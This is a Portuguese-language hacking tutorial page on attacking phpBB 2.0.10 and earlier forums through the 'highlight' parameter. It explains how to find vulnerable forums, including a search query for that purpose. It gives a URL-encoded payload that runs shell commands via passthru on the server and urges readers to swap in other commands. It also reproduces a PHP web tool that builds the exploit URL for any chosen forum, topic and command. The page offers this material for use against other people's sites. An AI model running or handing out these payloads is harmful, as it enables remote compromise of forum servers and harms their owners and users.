• HOME
• Exploit
• Videos
• Download
• Tutoriais

Tutoriais

Hackeando phpBB 2.0.10 e anteriores by pitt3r_p4rk3r

seguinte, pra encontrar o site, phpBB 2.0.10

ou algo do tipo, abre a pagina,e no final dela, vc tem que ver escrito
phpBB 2.0.10 ou menos que isso, a versão 2.0.11 nao tem esta falha

perfeito?

Nao, se fosse perfeito nao tinha a falha,

Encontrado algum site com o 2.0.10 na lista,
ex:
http://forums.site.com/viewtopic.php?p=99999

você entra no site, assim:

http://forums.site.com

entra em alguma Categoria.

e nessa categoria, vai haver muitos topicos, então, você

pega o link, que vem depois do "t=" que seria a ID do site,

no normal ficaria viewtopic.php?p= viewtopic.php?f=

sei la, mais la dentro, navegando no forum, vc vai encontrar

um viewtopic.php?t=

ficando assim

http://forums.site.com/viewtopic.php?t=30

então essa é a parte bugada, linda nao?

cole isso aqui depois do endereço do site:

&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20id%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

ficando assim:

http://forums.site.com/viewtopic.php?t=30&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20id%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

note que entre esse monte de % e numeros, existe um comando, id, viram?

pois é, a resposta no site(se o mesmo estiver vuln) será sua id.

bonito não?

basta agora alterar o id por outros comandos que vao vir da sua criatividade

ok?

Fonte:pitt3r_p4rk3r

Fazendo uma atualização!

Um meio mais fácil de se achar fóruns vulneráveis é fazendo a seguinte pesquisa:

"powered by phpbb 2.0.10"

<?
/*
Author: Paisterist
Date: 27/11/04
[N]eo [S]ecurity [T]eam [NST] ©
Description: This tool execute comands in the server of the forum selected. You need
the path of the forum with the "/" at the final. Besides you need to specify the number
of a topic that is in the forum, and, at the until, you put the commando in the input
box. */
?>
< html>
< head>
< title>phpBB 2.0.10 Remote Exploit by Paisterist</title>
< /head>
< body bgcolor=#000000 text=#FFFFFF link=#00ff00 vlink=#00FF00 alink=#00FF00>
< center><h4>Remote execution exploit in forums phpbb 2.0.10</h4></center>
< ?
if (isset($_POST[enviar])) {
$dir=$_POST[dir];
$cmd=$_POST[cmd];
$t=$_POST[t];
if ($dir!="" && $cmd!="" && $t!="") {
if (!ereg("http://", $dir)) $url="http://$dir";
else $url=$dir;
$large=strlen($cmd);
for ($i=0; $i<$large; $i++) {
$char=ord($cmd[$i]);
$cadena.="chr($char)";
if (($large-$i!=1) or $i==0) {
$cadena.="%252e";
}}
$url.="viewtopic.php?t=$t&highlight=%2527%252esystem(".$cadena.")%252e%2527";
print "<a href=$url>Hackear!</a>";
}}
?>
< form method=POST action=phpbb_exploit.php>
< table align=center>
< tr>
< td>Path of the forum (example: www.phpbb.com/phpBB/ ): </td>
< td><input type=text name=dir></td></td>
< /tr>
< tr>
< td>Comando a ejecutar: </td>
< td><input type=Text name=cmd></td>
< /tr>
< tr>
< td>Topic: </td>
< td><input name=t type=text></td>
< /tr>
< tr align=center>
< td colspan=2><input type=submit name=enviar value=Explotar></td>
< /tr>
< /table>
< /form>
< /body>
< /html>